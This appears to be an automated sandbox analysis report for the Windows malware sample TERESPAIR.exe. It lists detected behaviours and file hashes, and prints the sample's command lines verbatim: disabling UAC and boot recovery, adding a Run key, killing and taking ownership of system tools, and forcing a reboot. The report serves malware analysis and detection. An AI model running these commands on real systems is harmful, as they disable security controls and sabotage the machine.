Analysis Overview
SHA256
4c291a0e441b43a6d0bb77f5038ca736276e735196349abb6e9d4c7cc3fd4dc5
Threat Level: Known bad
The file TERESPAIR.exe was found to be: Known bad.
Malicious Activity Summary
UAC bypass
Modifies boot configuration data using bcdedit
Possible privilege escalation attempt
Modifies file permissions
Modifies system executable filetype association
Adds Run key to start application
File and Directory Permissions Modification: Windows File and Directory Permissions Modification
Drops file in System32 directory
Drops file in Windows directory
Enumerates physical storage devices
Unsigned PE
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Modifies registry class
Modifies data under HKEY_USERS
Kills process with taskkill
MITRE ATT&CK Matrix V13
Analysis: static1
Detonation Overview
Reported
2024-07-01 02:21
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-07-01 02:21
Reported
2024-07-01 02:22
Platform
win11-20240508-en
Max time kernel
5s
Max time network
8s
Command Line
Signatures
UAC bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\system32\reg.exe | N/A |
Modifies boot configuration data using bcdedit
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
Possible privilege escalation attempt
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
Modifies system executable filetype association
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\DefaultIcon | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\5767.tmp\\SKULL.ico" | C:\Windows\system32\reg.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000\Software\Microsoft\Windows\CurrentVersion\Run\death.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\5767.tmp\\death.exe" | C:\Windows\system32\reg.exe | N/A |
File and Directory Permissions Modification: Windows File and Directory Permissions Modification
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\System32\mmc.exe | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\mmc.exe | C:\Windows\system32\cmd.exe | N/A |
| File created | C:\Windows\System32\UserAccountControlSettings.exe | C:\Windows\system32\cmd.exe | N/A |
| File created | C:\Windows\System32\chkdsk.exe | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\chkdsk.exe | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\taskmgr.exe | C:\Windows\system32\cmd.exe | N/A |
| File created | C:\Windows\System32\taskkill.exe | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\taskkill.exe | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\UserAccountControlSettings.exe | C:\Windows\system32\cmd.exe | N/A |
| File created | C:\Windows\System32\taskmgr.exe | C:\Windows\system32\cmd.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\regedit.exe | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\regedit.exe | C:\Windows\system32\cmd.exe | N/A |
Enumerates physical storage devices
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365268" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = 99ebff004cc2ff000091f8000078d4000067c000003e9200001a6800f7630c00 | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4290799360" | C:\Windows\system32\LogonUI.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1" | C:\Windows\system32\LogonUI.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292114432" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292114432" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365268" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "24" | C:\Windows\system32\LogonUI.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\5767.tmp\\SKULL.ico" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\txtfile\DefaultIcon | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\txtfile | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\txtfile\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\5767.tmp\\SKULL.ico" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\DefaultIcon | C:\Windows\system32\reg.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\shutdown.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\system32\shutdown.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\LogonUI.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\TERESPAIR.exe
"C:\Users\Admin\AppData\Local\Temp\TERESPAIR.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\5767.tmp\5768.tmp\5769.bat C:\Users\Admin\AppData\Local\Temp\TERESPAIR.exe"
C:\Windows\system32\bcdedit.exe
bcdedit /set {default} recoveryenabled No
C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\Control Panel\Cursors" /v Arrow /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\5767.tmp\cursor.cur" /f
C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\Control Panel\Cursors" /v Hand /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\5767.tmp\cursor.cur" /f
C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\Control Panel\Cursors" /v AppStarting /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\5767.tmp\cursor.cur" /f
C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\Control Panel\Cursors" /v Wait /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\5767.tmp\cursor.cur" /f
C:\Windows\system32\reg.exe
reg add "HKEY_CLASSES_ROOT\exefile\DefaultIcon" /ve /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\5767.tmp\SKULL.ico" /f
C:\Windows\system32\reg.exe
reg add "HKEY_CLASSES_ROOT\txtfile\DefaultIcon" /ve /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\5767.tmp\SKULL.ico" /f
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f
C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v death.exe /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\5767.tmp\death.exe" /f
C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\5767.tmp\bg.jpg" /f
C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop" /v NoChangingWallpaper /t REG_DWORD /d 1 /f
C:\Windows\system32\taskkill.exe
taskkill /f /im regedit.exe
C:\Windows\system32\taskkill.exe
taskkill /f /im taskmgr.exe
C:\Windows\system32\taskkill.exe
taskkill /f /im mmc.exe
C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\regedit.exe"
C:\Windows\system32\icacls.exe
icacls "C:\Windows\regedit.exe" /grant everyone:F
C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32\taskmgr.exe"
C:\Windows\system32\icacls.exe
icacls "C:\Windows\System32\taskmgr.exe" /grant everyone:F
C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32\taskkill.exe"
C:\Windows\system32\icacls.exe
icacls "C:\Windows\System32\taskkill.exe" /grant everyone:F
C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32\mmc.exe"
C:\Windows\system32\icacls.exe
icacls "C:\Windows\System32\mmc.exe" /grant everyone:F
C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32\UserAccountControlSettings.exe"
C:\Windows\system32\icacls.exe
icacls "C:\Windows\System32\UserAccountControlSettings.exe" /grant everyone:F
C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32\chkdsk.exe"
C:\Windows\system32\icacls.exe
icacls "C:\Windows\System32\chkdsk.exe" /grant everyone:F
C:\Windows\system32\shutdown.exe
shutdown /r /t 0
C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x4 /state0:0xa3a12055 /state1:0x41c64e6d
Network
Files
C:\Users\Admin\AppData\Local\Temp\5767.tmp\5768.tmp\5769.bat
| MD5 | 8894013652db082fb9a4ce91bf40222f |
| SHA1 | d79e5f5f4984ea0f2648b6155feecf3d786767e5 |
| SHA256 | c3914537fd001edc8d9d9d6497cbd942de5b478d391a00ca07f86af017c62359 |
| SHA512 | 94c3587a6d141d8e1b7f3e1b49173e65b1c51f327f5e676ee7a072384ee0fec0ed4f56a67704dbf7ad254aa16ba75490da018a9591cb5326deb317a21ae604f9 |
C:\Users\Admin\AppData\Local\Temp\5767.tmp\popups.exe
| MD5 | d7f63114aade341d8a3f6924cdfa182a |
| SHA1 | ebf02b5fc29dde742321f2bc5bf80575907d7daf |
| SHA256 | 1e6d2f793b52c9099dea1c94bb97e1e4e10683ef588cf090a82781c67779ebeb |
| SHA512 | 763d369c0002b64436f74b89ffd1879f9390445713634b73e3fd3fe40ba57373efa86d0c102d79571b5f21f2ce972475517b716c7567b3fcb1fc225e94de51a5 |
C:\Users\Admin\Desktop\OPENME5.txt
| MD5 | 4207e6b2edf7d32f4ffa65b257b84598 |
| SHA1 | 44b173829cb9a85997ebc1e9184080534404b5ff |
| SHA256 | 4ded9a36558a18aaf67f9cddc11e60ad4f8f45230a50626fdb60de7ee1ff0f4c |
| SHA512 | c4deaeb10de42d997b6fda00ff2266ee41ebb9b901043a9e6f106b166d6a2559acb9329a4ff4b611c4c6bf08662dd2461248118f5076ade34357f18973213954 |